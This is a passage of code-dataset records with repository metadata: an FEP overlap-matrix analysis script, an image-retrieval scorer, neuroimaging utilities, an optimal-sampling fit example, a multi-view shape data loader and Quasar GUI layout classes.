f\"logs/overlap_bound_{sys.argv[1]}~{sys.argv[2]}.png\")\nelse:\n print(\"Failed to write overlap matrix for bound leg.\")\nif overlap_matrix_free:\n np.save(f\"logs/overlap_free_{sys.argv[1]}~{sys.argv[2]}\", np.matrix(overlap_matrix_free))\n plotOverlapMatrix(np.matrix(overlap_matrix_free), f\"logs/overlap_free_{sys.argv[1]}~{sys.argv[2]}.png\")\nelse:\n print(\"Failed to write overlap matrix for free leg.\")\n", "repo_name": "michellab/BioSimSpaceTutorials", "sub_path": "04_fep/fep_archiv/execution_model/scripts/BSSanalyseFEP.py", "file_name": "BSSanalyseFEP.py", "file_ext": "py", "file_size_in_byte": 4115, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "32", "api": [{"api_name": "matplotlib.use", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.colors.BoundaryNorm", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 34, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}, {"api_name": "BioSimSpace.FreeEnergy.Relative.analyse", "line_number": 59, "usage_type": "call"}, {"api_name": "BioSimSpace.FreeEnergy", "line_number": 59, "usage_type": "attribute"}, {"api_name": "BioSimSpace.FreeEnergy.Relative.analyse", "line_number": 60, "usage_type": "call"}, {"api_name": "BioSimSpace.FreeEnergy", "line_number": 60, "usage_type": "attribute"}, {"api_name": "BioSimSpace.FreeEnergy.Relative.difference", "line_number": 62, "usage_type": "call"}, {"api_name": "BioSimSpace.FreeEnergy", "line_number": 62, "usage_type": "attribute"}, {"api_name": "BioSimSpace._Exceptions.AnalysisError", "line_number": 66, "usage_type": "attribute"}, {"api_name": "BioSimSpace._Exceptions", "line_number": 66, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 71, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 87, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 107, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 108, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.save", "line_number": 112, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}]}
+{"seq_id": "42894412592", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nimport h5py\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\n\n#参数配置\nfeaturename1=\"../gem_res_holiday_1.h5\"\nfeaturename2=\"../gem_res_holiday_2.h5\"\nfeaturename3=\"../gem_res_holiday_3.h5\"\n\n\nquerySize=500\ndatasetSize=1491 #原始数据库大小\n\ndef postProcess(feats):\n # 在这里正则\n # l2norm之前已经进行了一次\n # pca\n pca = PCA(n_components=8, svd_solver='auto', whiten=True)\n # 使用oxford来训练\n h5f = h5py.File(\"../gem_res_ox_3.h5\", 'r')\n feat_train = h5f['dataset_1'][:]\n pca.fit_transform(feat_train)\n feats = pca.transform(feats)\n # h5f.close()\n # l2renorm\n feats=preprocessing.normalize(feats, norm='l2')\n return feats\n# 实现得到数据库的vector\nh5f1 = h5py.File(featurename1, 'r')\nh5f2 = h5py.File(featurename2, 'r')\nh5f3 = h5py.File(featurename3, 'r')\n\nfeats1 = h5f1['dataset_1'][:]\nfeats2 = h5f2['dataset_1'][:]\nfeats3 = h5f3['dataset_1'][:]\n\n# print(\"---------feats1---------\")\n# print(feats1.shape)\n# print(\"---------feats2---------\")\n# print(feats2)\n# print(\"---------feats3---------\")\n# print(feats3)\n\n\n\n\n# 进行后处理\nfeats1 = postProcess(feats1)\nfeats2 = postProcess(feats2)\nfeats3 = postProcess(feats3)\n\n\n# 这里是带后缀的裁剪图片\nimgNames1 = h5f1['dataset_2'][:]\nimgNames2 = h5f2['dataset_2'][:]\nimgNames3 = h5f3['dataset_2'][:]\n\n\nh5f1.close()\nh5f2.close()\nh5f3.close()\n\ndef getLayerImgNames(L):\n if L==1:\n return imgNames1\n elif L==2:\n return imgNames2\n elif L==3:\n return imgNames3\n\ndef getLayerFeats(L):\n if L==1:\n return feats1\n elif L==2:\n return feats2\n elif L==3:\n return feats3\n\ndef getResult(query,feats,imgNames):\n #不用输入模型重复计算\n queryVec=feats[imgNames.tolist().index(np.string_(query))]\n scores = np.dot(queryVec, feats.T)\n\n\n rank_ID = np.argsort(scores)[::-1]\n rank_score = scores[rank_ID]\n # number of top retrieved images to show\n maxres = datasetSize\n imlist = [imgNames[index].decode() for i, index in enumerate(rank_ID[0:maxres])]\n print(\"top %d images in order are: \" % maxres, imlist[0:10])\n return imlist\n\ndef getImageScore(Lr,Lq,query):\n subScores=[]\n for i in range(1,Lq+1):\n if i==1:\n npfinalScore=getsubqueryScore(Lr, query, getLayerFeats(i), getLayerImgNames(i))\n for item in range(datasetSize):\n npfinalScore[item]=npfinalScore[item]*Lr\n subScores.append(npfinalScore)\n continue\n img_name = os.path.splitext(query)[0]\n for j in range(i):\n for k in range(i):\n subPatchName = img_name + \"_\" + str(j) + str(k) + \".jpg\"\n npfinalScore=getsubqueryScore(Lr, subPatchName, getLayerFeats(i), getLayerImgNames(i))\n for item in range(datasetSize):\n #改变子块权重\n npfinalScore[item] = npfinalScore[item]\n subScores.append(npfinalScore)\n finalScore=[0.0,]*datasetSize\n for i in range(datasetSize):\n for j in range(len(subScores)):\n #相加\n finalScore[i]+=subScores[j][i]\n finalScore[i]=finalScore[i]#/len(subScores)\n return np.array(finalScore)\n# 得到query图片的当前子块分数向量\ndef getsubqueryScore(Lr,subquery,qfeats,qimgNames):\n finalScore = []\n layerScores = []\n i = Lr\n while i > 0:\n totalSubOfLayer = i * i\n # 计算每个查询图的最小feature分数\n queryVec = qfeats[qimgNames.tolist().index(np.string_(subquery))]\n scores = np.dot(queryVec, getLayerFeats(i).T)\n\n max = float('-inf') # 未做归一化,值的范围要这样设置\n #重设分数\n score = []\n for k in range(len(scores)):\n # 得到当前layer块中的最相似的子块\n if (max < scores[k]):\n max = scores[k]\n if ((k + 1) % totalSubOfLayer == 0):\n score.append(max)\n max = float('-inf')\n i = i - 1\n #加入每层的最终分数\n layerScores.append(score)\n #根据每层的分数得到查询图片的最终分数\n for j in range(datasetSize):\n max = float('-inf')\n for i in range(Lr):\n if(max>> fix_multi_source_name([\n ... '/path/to/sub-045_ses-test_T1w.nii.gz',\n ... '/path/to/sub-045_ses-retest_T1w.nii.gz'])\n '/path/to/sub-045_T1w.nii.gz'\n \"\"\"\n import re\n\n from nipype.utils.filemanip import filename_to_list\n\n if not isinstance(in_files, (tuple, list)):\n return in_files\n elif len(in_files) == 1:\n return in_files[0]\n\n p = Path(filename_to_list(in_files)[0])\n # subject_label = p.name.split(\"_\", 1)[0].split(\"-\")[1]\n try:\n subj = re.search(r\"(?<=^sub-)[a-zA-Z0-9]*\", p.name).group()\n suffix = re.search(r\"(?<=_)\\w+(?=\\.)\", p.name).group()\n except AttributeError:\n raise AttributeError(\"Could not extract BIDS information\")\n return str(p.parent / f\"sub-{subj}_{suffix}.nii.gz\")\n\n\ndef check_deps(workflow):\n \"\"\"Make sure dependencies are present in this system.\"\"\"\n from nipype.utils.filemanip import which\n\n return sorted(\n (node.interface.__class__.__name__, node.interface._cmd)\n for node in workflow._get_all_nodes()\n if (hasattr(node.interface, \"_cmd\") and which(node.interface._cmd.split()[0]) is None)\n )\n\n\ndef cohort_by_months(template, months):\n \"\"\"\n Produce a recommended cohort based on partipants age\n \"\"\"\n cohort_key = {\n \"MNIInfant\": (\n # upper bound of template | cohort\n 2, # 1\n 5, # 2\n 8, # 3\n 11, # 4\n 14, # 5\n 17, # 6\n 21, # 7\n 27, # 8\n 33, # 9\n 44, # 10\n 60, # 11\n ),\n \"UNCInfant\": (\n 8, # 1\n 12, # 2\n 24, # 3\n ),\n }\n ages = cohort_key.get(template)\n if ages is None:\n raise KeyError(\"Template cohort information does not exist.\")\n\n for cohort, age in enumerate(ages, 1):\n if months <= age:\n return cohort\n raise KeyError(\"Age exceeds all cohorts!\")\n\n\ndef check_total_memory(recommended_gb):\n \"\"\"\n Check total memory allocated to the process, and compare with a recommended value.\n If available memory is equal to or greater than recommended, return ``True``.\n Otherwise, return ``False``.\n \"\"\"\n\n try:\n import psutil\n except ImportError:\n return\n\n tot = int(psutil.virtual_memory().total / 1024**3)\n return tot >= recommended_gb\n\n\ndef combine_meepi_source(in_files):\n \"\"\"\n Create a new source name when optimally\n combining multiple multi-echo EPIs\n >>> combine_meepi_source([\n ... 'sub-01_run-01_echo-1_bold.nii.gz',\n ... 'sub-01_run-01_echo-2_bold.nii.gz',\n ... 'sub-01_run-01_echo-3_bold.nii.gz',])\n 'sub-01_run-01_bold.nii.gz'\n \"\"\"\n import os\n\n from nipype.utils.filemanip import filename_to_list\n\n base, in_file = os.path.split(filename_to_list(in_files)[0])\n entities = [ent for ent in in_file.split(\"_\") if not ent.startswith(\"echo-\")]\n basename = \"_\".join(entities)\n return os.path.join(base, basename)\n\n\ndef get_file(pkg: str, src_path: Union[str, Path]) -> str:\n \"\"\"\n Get or extract a source file.\n Assures the file will be available until the lifetime of the current Python process.\n \"\"\"\n import atexit\n from contextlib import ExitStack\n\n try:\n from importlib.resources import as_file, files\n except ImportError:\n from importlib_resources import as_file, files\n\n file_manager = ExitStack()\n atexit.register(file_manager.close)\n ref = files(pkg) / str(src_path)\n fl = file_manager.enter_context(as_file(ref))\n return str(fl)\n", "repo_name": "nipreps/nibabies", "sub_path": "nibabies/utils/misc.py", "file_name": "misc.py", "file_ext": "py", "file_size_in_byte": 3925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "nipype.utils.filemanip.filename_to_list", "line_number": 28, "usage_type": "call"}, {"api_name": "re.search", "line_number": 31, "usage_type": "call"}, {"api_name": "re.search", "line_number": 32, "usage_type": "call"}, {"api_name": "nipype.utils.filemanip.which", "line_number": 45, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "nipype.utils.filemanip.filename_to_list", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 120, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 120, "usage_type": "name"}, {"api_name": "contextlib.ExitStack", "line_number": 133, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 134, "usage_type": "call"}, {"api_name": "importlib_resources.files", "line_number": 135, "usage_type": "call"}, {"api_name": "importlib_resources.as_file", "line_number": 136, "usage_type": "call"}]}
+{"seq_id": "32125616294", "text": "import numpy as np\r\nfrom scipy.special import factorial\r\nimport optimalSampling\r\nfrom matplotlib import pyplot as plt\r\n\r\nclass fvesFunction():\r\n\r\n def poissonfunction(self, x, x_average):\r\n return (x_average ** x * np.exp(-x_average)) / factorial(x)\r\n\r\n def getFunction(self, xn, beta):\r\n\r\n laccessible = xn\r\n\r\n kp = beta[0]\r\n\r\n W = 55.5 # water concentration\r\n NAvogadro = 6.022E23\r\n\r\n # fixed parmeters (can be input as beta parameters)\r\n # freeprobe = beta[1]\r\n # ptotal = beta[2]\r\n # vtotal = beta[3]\r\n # mu = beta[4]\r\n\r\n ximax = 1\r\n freeprobe = 0.02\r\n q = 1.3\r\n ptotal = 2.5e-8 # in M\r\n vtotal = 1.5e-4 # in L\r\n mu = 125000\r\n\r\n LTotal = 2 * laccessible\r\n\r\n xm = (kp * laccessible * ximax) / (W + kp * laccessible)\r\n try:\r\n k_average = xm * ptotal * mu / LTotal\r\n # print(k_average)\r\n except:\r\n print('Tengo un problema')\r\n\r\n nvestotal = LTotal * vtotal * NAvogadro / mu\r\n nprottotal = ptotal * vtotal * NAvogadro\r\n\r\n nprotfree = nprottotal * (1 - xm)\r\n\r\n max_bind = 100\r\n k = np.linspace(1,max_bind, max_bind)\r\n\r\n sump = np.sum(k ** 2 * self.poissonfunction(k, np.asarray(k_average)))\r\n\r\n ndye = freeprobe * nprottotal\r\n fves = sump * nvestotal / (ndye * q ** 2 + nprotfree + sump * nvestotal)\r\n return fves\r\n\r\n\r\nclass FVesFunction(optimalSampling.FittingFunctionLS):\r\n # Melo2011 function application\r\n def getFunction(self, xn, beta):\r\n return fvesFunction().getFunction(xn, beta)\r\n\r\n def postProcess(self, y):\r\n return np.clip(y,0.0,None)\r\n\r\n def getTrueSigma2(self, xn, beta):\r\n y=np.abs(self.getFunction(xn,beta))\r\n return self.sigma2*y*y\r\n\r\n def getWeight(self, xn, beta):\r\n y=np.abs(self.getFunction(xn,beta))\r\n return 1/y\r\n\r\n def getBetaStep1(self, i):\r\n return 1e2\r\n\r\n def getBetaStep1(self, j):\r\n return 1e2\r\n\r\n\r\nh=FVesFunction()\r\nh.sigma2=0.01\r\ntrueBeta=np.asarray([[5e5]])\r\n\r\n# I put 10 sampling points to properly follow the function as an example\r\n\r\nX=np.asarray([[1e-7], [5e-7], [1e-6], [1e-5], [5e-5],[1e-4], [5e-4], [1e-3], [5e-3], [1e-2], [5e-2]])\r\ny=h.simulateFunctionAtMultiplePoints(X, trueBeta, True)\r\n\r\nevaluator=optimalSampling.FIMEvaluator(optimalSampling.CramerRaoBound)\r\n\r\nstepx = 0.1\r\nbeta0 = np.asarray([[1e5]])\r\nN = 10\r\n\r\ngrid = np.exp(np.mgrid[-7:-2+stepx:stepx]) # x sampling in this function has to be logarithmic\r\noptimalSampling.simulateProcess(h,trueBeta,X,y,beta0,N,grid,evaluator, verbose=True, logxscale=True)", "repo_name": "cossorzano/optimalSampling", "sub_path": "optimalBatch6.py", "file_name": "optimalBatch6.py", "file_ext": "py", "file_size_in_byte": 2673, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.exp", "line_number": 9, "usage_type": "call"}, {"api_name": "scipy.special.factorial", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 50, "usage_type": "call"}, {"api_name": "optimalSampling.FittingFunctionLS", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 86, "usage_type": "call"}, {"api_name": "optimalSampling.FIMEvaluator", "line_number": 89, "usage_type": "call"}, {"api_name": "optimalSampling.CramerRaoBound", "line_number": 89, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.mgrid", "line_number": 95, "usage_type": "attribute"}, {"api_name": "optimalSampling.simulateProcess", "line_number": 96, "usage_type": "call"}]}
+{"seq_id": "34293339240", "text": "import cv2\nimport random\nimport numpy as np\nimport time\n#import Queue\ntry:\n import queue\nexcept ImportError:\n import Queue as queue\nimport threading\nimport globals as g_\nfrom concurrent.futures import ThreadPoolExecutor\n\nimport tensorflow as tf\nimport numpy as np\nimport random\nfrom numpy.random import choice, permutation\nfrom itertools import combinations\n\nW = H = 227\n\nclass Shape:\n def __init__(self, list_file):\n with open(list_file) as f:\n self.label = int(f.readline())\n self.V = int(f.readline())\n view_files = [l.strip() for l in f.readlines()]\n\n self.views = self._load_views(view_files, self.V)\n self.done_mean = False\n\n\n def _load_views(self, view_files, V):\n views = []\n for f in view_files:\n im = cv2.imread(f)\n im = cv2.resize(im, (W, H))\n # im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR) #BGR!!\n assert im.shape == (W,H,3), 'BGR!'\n im = im.astype('float32')\n views.append(im)\n views = np.asarray(views)\n return views\n\n def subtract_mean(self):\n if not self.done_mean:\n mean_bgr = (104., 116., 122.)\n for i in range(3):\n self.views[:,:,:,i] -= mean_bgr[i]\n\n self.done_mean = True\n\n def crop_center(self, size=(227,227)):\n w, h = self.views.shape[1], self.views.shape[2]\n wn, hn = size\n left = w / 2 - wn / 2\n top = h / 2 - hn / 2\n right = left + wn\n bottom = top + hn\n\n #Added by Hui\n left = int(left)\n top = int(top)\n right = int(right)\n bottom = int(bottom)\n\n self.views = self.views[:, left:right, top:bottom, :]\n\n\nclass Dataset:\n def __init__(self, listfiles, labels, subtract_mean, V):\n self.listfiles = listfiles\n self.labels = labels\n self.shuffled = False\n self.subtract_mean = subtract_mean\n self.V = V\n print('dataset inited')\n print (' total size:', len(listfiles))\n\n def shuffle(self):\n z = list(zip(self.listfiles, self.labels))\n random.shuffle(z)\n self.listfiles, self.labels = [list(l) for l in zip(*z)]\n self.shuffled = True\n\n\n def batches(self, batch_size):\n for x,y in self._batches_fast(self.listfiles, batch_size):\n yield x,y\n\n def sample_batches(self, batch_size, n):\n listfiles = random.sample(self.listfiles, n)\n for x,y in self._batches_fast(listfiles, batch_size):\n yield x,y\n\n def _batches(self, listfiles, batch_size):\n n = len(listfiles)\n for i in xrange(0, n, batch_size):\n starttime = time.time()\n\n lists = listfiles[i : i+batch_size]\n x = np.zeros((batch_size, self.V, 227, 227, 3))\n y = np.zeros(batch_size)\n\n for j,l in enumerate(lists):\n s = Shape(l)\n s.crop_center()\n if self.subtract_mean:\n s.subtract_mean()\n x[j, ...] = s.views\n y[j] = s.label\n\n print('load batch time:', time.time()-starttime, 'sec')\n yield x, y\n\n def _load_shape(self, listfile):\n s = Shape(listfile)\n s.crop_center()\n if self.subtract_mean:\n s.subtract_mean()\n return s\n\n def _batches_fast(self, listfiles, batch_size):\n subtract_mean = self.subtract_mean\n n = len(listfiles)\n\n def load(listfiles, q, batch_size):\n n = len(listfiles)\n with ThreadPoolExecutor(max_workers=16) as pool:\n for i in range(0, n, batch_size):\n sub = listfiles[i: i + batch_size] if i < n-1 else [listfiles[-1]]\n shapes = list(pool.map(self._load_shape, sub))\n views = np.array([s.views for s in shapes])\n labels = np.array([s.label for s in shapes])\n q.put((views, labels))\n\n # indicate that I'm done\n q.put(None)\n\n # This must be larger than twice the batch_size\n q = queue.Queue(maxsize=g_.INPUT_QUEUE_SIZE)\n\n # background loading Shapes process\n p = threading.Thread(target=load, args=(listfiles, q, batch_size))\n # daemon child is killed when parent exits\n p.daemon = True\n p.start()\n\n\n x = np.zeros((batch_size, self.V, 227, 227, 3))\n y = np.zeros(batch_size)\n\n for i in range(0, n, batch_size):\n starttime = time.time()\n\n item = q.get()\n if item is None:\n break\n x, y = item\n\n # print 'load batch time:', time.time()-starttime, 'sec'\n yield x, y\n\n def size(self):\n \"\"\" size of listfiles (if splitted, only count 'train', not 'val')\"\"\"\n return len(self.listfiles)\n\n\n\n#Added by Hui Wang for siamese network\nclass BatchGenerator():\n def __init__(self, listfiles, labels, subtract_mean, V):\n self.listfiles = listfiles\n self.labels = labels\n self.subtract_mean = subtract_mean\n self.V = V\n\n classDict = np.unique(np.array(self.labels))\n self.numberOfClass = len(classDict.tolist())\n\n np.random.seed(0)\n random.seed(0)\n self.num_idx = dict()\n for idx, num in enumerate(self.labels):\n if num in self.num_idx:\n self.num_idx[num].append(idx)\n else:\n self.num_idx[num] = [idx]\n\n def get_i_views(self, i):\n view_name = self.listfiles[i]\n view = Shape(view_name)\n view.crop_center()\n if self.subtract_mean:\n view.subtract_mean()\n return view.views\n\n def next_batch(self):\n numOfGenuine = g_.batch_size_genuine\n numOfImposter = g_.batch_size_impostor\n batch_size = numOfGenuine + numOfImposter\n\n left = np.zeros((batch_size, self.V, 227, 227, 3))\n right = np.zeros((batch_size, self.V, 227, 227, 3))\n sim = np.zeros(batch_size)\n\n num = 0\n # genuine\n index_ = 0\n indexes_ = []\n ii_ = []\n jj_ = []\n for i in range(self.numberOfClass):\n l = choice(self.num_idx[i], 2, replace=False).tolist()\n ii_.append(l.pop())\n jj_.append(l.pop())\n indexes_.append(index_)\n index_ = index_ + 1\n\n select_index_ = choice(range(0, index_), numOfGenuine, replace=False).tolist()\n for k in range(0, numOfGenuine):\n kk = select_index_[k]\n le_ = ii_[kk]\n ri_ = jj_[kk]\n left[num, ...] = self.get_i_views(le_)\n right[num, ...] = self.get_i_views(ri_)\n sim[num] = 1\n num = num + 1\n\n # impostor\n index = 0\n indexes = []\n ii = []\n jj = []\n for i, j in combinations(range(self.numberOfClass), 2):\n indexes.append(index)\n ii.append(choice(self.num_idx[i]))\n jj.append(choice(self.num_idx[j]))\n index = index + 1\n\n select_index = choice(range(0, index), numOfImposter, replace=False).tolist()\n for k in range(0, numOfImposter):\n kk = select_index[k]\n le = ii[kk]\n ri = jj[kk]\n left[num, ...] = self.get_i_views(le)\n right[num, ...] = self.get_i_views(ri)\n sim[num] = 0\n num = num + 1\n\n return np.array(left), np.array(right), np.array(sim)\n\n def size(self):\n \"\"\" size of train dataset\"\"\"\n return len(self.listfiles)\n\n\n", "repo_name": "alittleTom/OVFF", "sub_path": "retrieval/input.py", "file_name": "input.py", "file_ext": "py", "file_size_in_byte": 7605, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 42, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 82, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "time.time", "line_number": 113, "usage_type": "call"}, {"api_name": "concurrent.futures.ThreadPoolExecutor", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 134, "usage_type": "call"}, {"api_name": "Queue.Queue", "line_number": 141, "usage_type": "call"}, {"api_name": "globals.INPUT_QUEUE_SIZE", "line_number": 141, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "time.time", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 181, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 182, "usage_type": "call"}, {"api_name": "globals.batch_size_genuine", "line_number": 199, "usage_type": "attribute"}, {"api_name": "globals.batch_size_impostor", "line_number": 200, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 220, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 251, "usage_type": "call"}]}
+{"seq_id": "45880597652", "text": "\"\"\"\nThis module contains all the Quasar elements that help with the general layout of the page.\n\"\"\"\n\nfrom typing import List, Union\n\nfrom quasargui.base import Component, ComponentWithModel\nfrom quasargui.callbacks import toggle\nfrom quasargui.model import Model, Reactive\nfrom quasargui.quasar_components import QButton\nfrom quasargui.tools import merge_classes, build_props\nfrom quasargui.typing import EventsType, ClassesType, StylesType, PropsType, ChildrenType, PropValueType\n\n\nclass QLayout(Component):\n \"\"\"\n see: https://quasar.dev/layout-builder\n \"\"\"\n component = 'q-layout'\n\n def __init__(self,\n children: List[Union['QHeader', 'QDrawer', 'QPage', 'QFooter']] = None,\n view: str = \"hHh lpR fFf\",\n props: PropsType = None,\n events: EventsType = None\n ):\n \"\"\"\n :param view: see layout-builder, the default value is good for most cases\n :param props:\n \"\"\"\n props = props or {}\n props['view'] = props.get('view', view)\n children = self.build_children(children)\n super().__init__(children=children, props=props, events=events)\n\n @staticmethod\n def build_children(children):\n sandwich_menus = {}\n header = None\n for child in children:\n if isinstance(child, QDrawer):\n if child.menu_in_header:\n sandwich_menus[child.props['side']] = child.model\n if isinstance(child, QHeader):\n header = child\n\n if header is not None and sandwich_menus:\n target = header.children[0] if isinstance(header.children[0], QToolbar) else header\n for side, model in sandwich_menus.items():\n menu_btn = QButton(\n icon='menu',\n classes='float-right' if side == QDrawer.RIGHT else '',\n props={'dense': True},\n events={'click': toggle(model)}\n )\n target.set_children(\n [menu_btn, *target.children] if side == QDrawer.LEFT\n else [*target.children, menu_btn])\n return children\n # TODO: we could have here a set_page() function that corresponds to the route's on a webpage.\n\n\nclass QHeader(ComponentWithModel):\n \"\"\"\n q-header\n Use it within a QLayout.\n ref. https://quasar.dev/layout/header-and-footer#qheader-api\n \"\"\"\n component = 'q-header'\n PRIMARY = 'bg-primary text-white' # convenience constant\n\n defaults = {\n 'props': {\n 'reveal': False, # this is hide_on_scroll\n 'elevated': False,\n 'bordered': False,\n }\n }\n\n def __init__(self,\n children: ChildrenType = None,\n hide_on_scroll: bool = None, # this is the reveal prop\n elevated: bool = None,\n bordered: bool = None,\n show: PropValueType[bool] = True,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None\n ):\n if 1 <= len(children) <= 2 and isinstance(children[-1], str):\n children = [QToolbar([QToolbarTitle(children)])]\n\n props = build_props({}, props, {\n 'reveal': hide_on_scroll,\n 'elevated': elevated,\n 'bordered': bordered,\n })\n model = show if isinstance(show, Reactive) else Model(show)\n super().__init__(model=model, children=children, classes=classes, styles=styles, props=props)\n\n\nclass QDrawer(ComponentWithModel):\n \"\"\"\n q-drawer\n Use it within a QLayout.\n ref. https://quasar.dev/layout/drawer#qdrawer-api\n \"\"\"\n component = 'q-drawer'\n # side constants\n LEFT = 'left'\n RIGHT = 'right'\n # behavior constants\n DESKTOP = 'desktop'\n MOBILE = 'mobile'\n RESPONSIVE = 'default'\n\n defaults = {\n 'props': {\n 'behavior': DESKTOP,\n 'overlay': False,\n 'bordered': True,\n 'side': LEFT,\n 'width': 200,\n }\n }\n\n def __init__(self,\n children: ChildrenType = None,\n menu_in_header: bool = True,\n side: str = None,\n show: Union[Model, bool] = True,\n bordered: bool = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n \"\"\"\n :menu_in_header: if used together with QLayout, it instructs to put a close menu into the header.\n \"\"\"\n self.menu_in_header = menu_in_header\n children = children\n props = build_props({}, props, {\n 'side': side,\n 'bordered': bordered,\n })\n model = show if isinstance(show, Reactive) else Model(show)\n super().__init__(model=model, children=children, classes=classes, styles=styles, props=props, events=events)\n\n\nclass QPage(Component):\n \"\"\"\n q-page wrapped in q-page-container\n Use it within a QLayout.\n every parameter applies to the q-page.\n \"\"\"\n component = 'q-page-container'\n defaults = {\n 'props': {\n 'padding': True,\n }\n }\n\n def __init__(self,\n children: ChildrenType = None,\n padding: PropValueType[bool] = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n props = build_props({}, props, {'padding': padding})\n self.page = _Page(children=children, classes=classes, styles=styles, props=props, events=events)\n super().__init__(children=[self.page])\n\n\nclass _Page(Component):\n \"\"\"\n Internal component for the QPage,\n since in quasar q-page is always wrapped into q-page-container.\n \"\"\"\n component = 'q-page'\n\n def __init__(self,\n children: ChildrenType = None,\n classes: ClassesType = None,\n styles: StylesType = None,\n props: PropsType = None,\n events: EventsType = None\n ):\n super().__init__(children=children, classes=classes, styles=styles, props=props, events=events)\n\n\nclass QFooter(ComponentWithModel):\n \"\"\"\n q-footer\n ref. https://quasar.dev/layout/header-and-footer#qfooter-api\n 